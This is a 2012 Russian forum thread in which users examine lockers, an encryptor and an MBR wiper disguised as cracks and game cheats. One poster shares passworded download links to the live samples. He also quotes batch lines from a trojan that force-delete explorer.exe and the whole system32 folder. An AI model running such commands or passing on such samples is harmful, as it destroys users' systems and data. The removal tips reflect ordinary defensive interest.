Ru-Board.club
← Вернуться в раздел «Microsoft Windows»

» Windows заблокирован!

Автор: Chekis9100
Дата сообщения: 18.02.2012 22:32
olzaruta

Да уж веселенькие приколы!!!
Автор: olzaruta
Дата сообщения: 18.02.2012 22:32
- Многие в сети ищут всяческие ..кряки..крэки..таблэтки..и разный другой халявный софт....и вот нашли...Программа для восстановления контроля над аккаунтом ВКонтакте. .........wishmaster.exe
- Качаем http://zalil.ru/32733479 пароль 2012
- Получаем http://i29.fastpic.ru/big/2012/0211/26/65027199483cd6f93eda7560a08cab26.jpg
- Запускаем.....и http://files.myopera.com/Aminux/albums/2908091/20101204_MBR_Destroyer1.png
- Через 6 секунд машина выключается, а при её включении экран компьютера будет выглядеть примерно следующим образом: http://files.myopera.com/Aminux/albums/2908091/20101204_MBR_Destroyer2.png
- В общем, вирусня начисто сносит MBR (главную загрузочную запись) и затирает мусором таблицу разделов.
- Под Win7 окошко выкидывает, но испортить диск не получается, но если отключить защитник винды?..то как знать..как знать...
- Экспериментируйте на свой страх и риск.....
Автор: sasherb
Дата сообщения: 18.02.2012 22:35

Цитата:
Вот скрин

Цитата:
-...посмейтесь

Похоже школота добралась до конструктора
Автор: KLASS
Дата сообщения: 18.02.2012 23:36

Цитата:
школота добралась до конструктора


olzaruta
Немного грубовато... убивает первый диск (в моем случае PATA'шный), а если система стоит на SATA и в БИОС выставлена загрузка с него, то все грузится. В любом случае народу, кто жамкает без разбору, нервы попортит. Поковыряться надо, спасибо, занятная вещица.
Автор: olzaruta
Дата сообщения: 19.02.2012 09:25
KLASS

Эти штучки еще цветочки! Я по круче тестил...если не боитесь могу выложить для эксперимента......
Автор: Varnavara
Дата сообщения: 19.02.2012 09:56
Да, школота резвится не в меру. Теперь опасно гулять по инету и не только тем " кто жамкает без разбору". Почитала ващи посты и стало страшно, аж жуть
Автор: IvANANvI
Дата сообщения: 19.02.2012 09:57

olzaruta (23:47 18-02-2012)
Цитата:
-...посмейтесь  

Самое главное, что запрос всего 30 р. Пионерам на пивко.

Автор: KLASS
Дата сообщения: 19.02.2012 10:11
olzaruta

Цитата:
могу выложить

С удовольствием посмотрел бы... опыт лишним не бывает
Автор: olzaruta
Дата сообщения: 19.02.2012 10:19
- Ну что же....продолжим.....для разминки вначале
- Ищем в сети пароли на платные сайты....находим....пароль_2.exe
- Качаем: http://zalil.ru/32734710 пароль прежний...
- Запускаем....получаем: http://i32.fastpic.ru/big/2012/0219/ce/fa84574703eae604c0d4ee12e563b6ce.jpg
- Развлекайтесь...а то все про пионерию пишут....хорошие были времена..веселые...
- Это шифровщик.....если не ошибаюсь код разблокировки: hf8374-sf3gv-dfgt3g-343g2-vbbrt-34rgd-se4gbb-4534v
- ....но может и ошибаюсь...
-...можно и в ручную поколдовать....
- ..продолжение следует.....
Автор: Varnavara
Дата сообщения: 19.02.2012 10:25
olzaruta
Спасибо, интересно конечно, ну а я не рискну-опыта маловато.
Автор: olzaruta
Дата сообщения: 19.02.2012 10:28

Цитата:
Varnavara


Цитата:
Спасибо, интересно конечно, ну а я не рискну-опыта маловато.


Автор: nikhelfer
Дата сообщения: 19.02.2012 10:47
На прошлой неделе был такой кейс. Блокиратор срабатывал только при наличии сети про загрузке Windows. Если же сети не было, то можно было спокойно работать, т.к. блокиратор себя ничем не проявлял. Система - семерка, пользователь - ограниченный. В профиле пользователя в каталоге Temp находился файл ms0config32.exe, после удаления которого система работала и в сети.
Автор: olzaruta
Дата сообщения: 19.02.2012 10:51

Цитата:
nikhelfer


файлик ms0config32.exe дайте....протестим...разберем по винтикам....
Автор: KLASS
Дата сообщения: 19.02.2012 11:07
olzaruta

Цитата:
Качаем:

Писатели "перестарались"... на столе файл лежит "Как расшифровать файлы.txt", а прочесть его нечем, все похерено, в том числе и по сети ... и, если я на приведенной выше картинке нажал ОК, то куда деньги "слать" неизвестно. Это под админом, а под юзером все херится только по сети. Где то я уже встречал подобную игрушку.
На всякий напомню, кто в виртуалке будет пробовать не расшаривайте больше одной, тестовой папки на хосте, иначе все снесет.
Автор: olzaruta
Дата сообщения: 19.02.2012 11:09
- Следующий случай опять из истории поиска халявного софта...
- Совсем свеженький пионерский..в автозагрузку не прыгает..в реестре прописан не стандартно как все...
- Скрин на моей машине: http://i28.fastpic.ru/big/2012/0219/08/b7cd78446f7d1365ac7a114538d13908.jpg
- Я снял его программой prkiller142 за 2 сек, но можно и AnVir Task Manager..и тд.
- При нажатии клавиш WIN + M баннер сворачивается на панель задач..а тут вам поле действий с реестром и файлами.....
- Этот так называемый баннер я вскрыл прогой 7 zip...где так же можно посмотреть ветку реестра куда он прописан и найти код дезактивации...
- Открываем баннер внутри 7 zip http://i30.fastpic.ru/big/2012/0219/2d/813509004de42f609373281141f1ee2d.jpg
- Вот вам ветка реестра http://i29.fastpic.ru/big/2012/0219/9c/82d5707f4447f09f82d78cbcf1fdcf9c.jpg
-.... а вот и код разблокировки http://i27.fastpic.ru/big/2012/0219/63/73e8a99584bb64858919aa22a5ef4463.jpg
- ..а вот сам файл http://zalil.ru/32734962


Добавлено:

Цитата:
то куда деньги "слать" неизвестно


Почему неизвестно? На скрине четко виден номер телефона..и сумма прописана!
Автор: ua3vui
Дата сообщения: 19.02.2012 11:44
olzaruta

Цитата:
Скрин на моей машине: http://i28.fastpic.ru/big/2012/0219/08/b7cd78446f7d1365ac7a114538d13908.jpg

Там даже слово купюропрЕемник есть...А уж про лицИвой счет я молчу вообще. Школота...
Автор: KLASS
Дата сообщения: 19.02.2012 11:52

Цитата:
Открываем баннер внутри 7 zip

Total Commander по Ctrl+PageDown тоже открывает

Цитата:
а вот и код разблокировки

А как его там находить в такой куче мусора без отладчика?

Цитата:
На скрине четко виден номер телефона

Так я ж говорю, кнопку ОК нажал и все... нету телефона... перестарались.
Автор: olzaruta
Дата сообщения: 19.02.2012 11:58
- И из этой же оперы..про поиск Black_Admin для игры в как это...Counter-strike ...
- Нашли и качнули... http://i28.fastpic.ru/big/2012/0219/95/be3196b43c1ad0ec4239ed10a4b3ee95.jpg
-..а так же запустили....получили.... http://i32.fastpic.ru/big/2012/0219/11/d0d6444d268fd9a6d5d5eefb86830d11.jpg
-..тут уже полнейший наглеж...да же id указан....я к нему ВКонтакт залез...так он школу только в 2016 году заканчивает...
- ...файл для теста http://zalil.ru/32735221 пароль 2012

Добавлено:

Цитата:
KLASS


- С вашими доводами...согласен!
Автор: KLASS
Дата сообщения: 19.02.2012 12:25
Последний локер обойти можно входом в другого пользователя с вытекающими.
Автор: Varnavara
Дата сообщения: 19.02.2012 12:57
olzaruta
Смеетесь? Я поняла, не туда влезла, не на то замахнулась. Согласна
Автор: olzaruta
Дата сообщения: 19.02.2012 12:59
- Ну что же...разминка закончена....пионеры отдыхают...
- Перейдем к боевым действиям...
- Есть такая игра Half-Life....наверное в нее играли и играют не только дети но и взрослые...не так ли?
- Так вот....как я и писал ранее...многие ищут в сети ..трейлер и тд. для облегчения прохождения игры...а находят...убийцу винды....
- ...и скачивают очень интересный файлик Haif Life.exe.....
- это самораспаковывающийся архив!
- так же с помощью 7-ZIP я вскрыл этот архив и то, что я там увидел...
- ... там лежат два файла: help.bat и restore.reg. Что это за файлы - видно по расширениям.
- Так вот, в help.bat есть такие строчки:
**** del /f /s /q %systemroot%\explorer.exe
****del /f /s /q %systemroot%\system32\*.*
**** - это завуалировано, от греха подальше, ну а суть я думаю понятна...
- Этого уже достаточно, чтобы "убить" систему, но killer пошёл дальше. Есть ещё файл с расширением .reg. Там ещё веселее!!!
- Не буду всего описывать, приведу всего одну строчку (это прочитает потерпевший на своём мониторе после того, как запустит "игрушку" Half Life !!!
[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon] "LegalNoticeCaption"="У вас сегодня неудачный день!" "LegalNoticeText"="Извините, но я убил Вашу операционную систему! Прощайте! "
- файл http://zalil.ru/32735531 пароль тут не выложу.....пишите в ЛС
Автор: KLASS
Дата сообщения: 19.02.2012 13:16
olzaruta
Было уже нечто подобное, это даже не вирь, скорее, подлянка. А систему убить можно одной командой из батника, если сидим под админом.
Автор: olzaruta
Дата сообщения: 19.02.2012 13:41

Цитата:
Было уже нечто подобное, это даже не вирь, скорее, подлянка. А систему убить можно одной командой из батника, если сидим под админом.


- Согласен, но батник только систему снесет....и этот HL....для спеца в принципе не очень страшен.......затягиваешь ветку реестра от рабочей винды и делаешь проверку на жизненно важные системные файлы которые повреждены, автоматом восстанавливаются опля , на все ушло ровно 3мин. 40сек
- Но у меня есть еще на закуску..очень интересный файлик с расширением htm...так вот...при запуске он не только грохает винду, но и удаляет все данные со всех жестких дисков....вот так......а тут про пионерию говорят
- Ну вот, надеюсь мы оживили форум
Автор: KLASS
Дата сообщения: 19.02.2012 13:46

Цитата:
Но у меня есть еще на закуску..очень интересный файлик с расширением htm

Давай посмотрим...
Автор: olzaruta
Дата сообщения: 19.02.2012 13:59

Цитата:
Давай посмотрим...


- Можно....но не сегодня
Автор: 1Kipovec
Дата сообщения: 19.02.2012 14:15
olzaruta
во, вот цэ дило. А то всякую "муть дешовую" "надоело" отлавливать, хотЦа что и посерьёзней "пожамкать".


Цитата:
Давай посмотрим...

Присоединяюсь!!!


Цитата:
ms0config32.exe

попадался на ХР, но не чем себя "не проявлял", ясно вирустотал - молчёк. Отправил на Авиру, тож молча, НО намедне жена "перепутала" флехи и вставив в комп мою (с телом) авира - типавирь, а поскольку я её приучил, если визжит что вирь - удалить, вот и нету тела.
Автор: olzaruta
Дата сообщения: 19.02.2012 14:26

Цитата:
во, вот цэ дило. А то всякую "муть дешовую" "надоело" отлавливать, хотЦа что и посерьёзней "пожамкать".


Уговорили....сейчас залью....
- http://zalil.ru/32735531 пароль ******** - Убивает винду ( описалово на предыдущей странице )
- http://zalil.ru/32736604 пароль ****** - Убивает винду и грохает файлы на диске D
- Тестируйте на свой страх и риск.....только спецам
Автор: KLASS
Дата сообщения: 19.02.2012 16:43
olzaruta
Пароль на скачку дал, а на сами архивы...
Автор: sasherb
Дата сообщения: 19.02.2012 16:51
KLASS
В личку чирканул,пока молчек
Автор: olzaruta
Дата сообщения: 19.02.2012 17:19
пароли:
- первый: ******
- второй: ******

Страницы: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115

Предыдущая тема: "svchost.exe... память не может быть "read"&q


Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.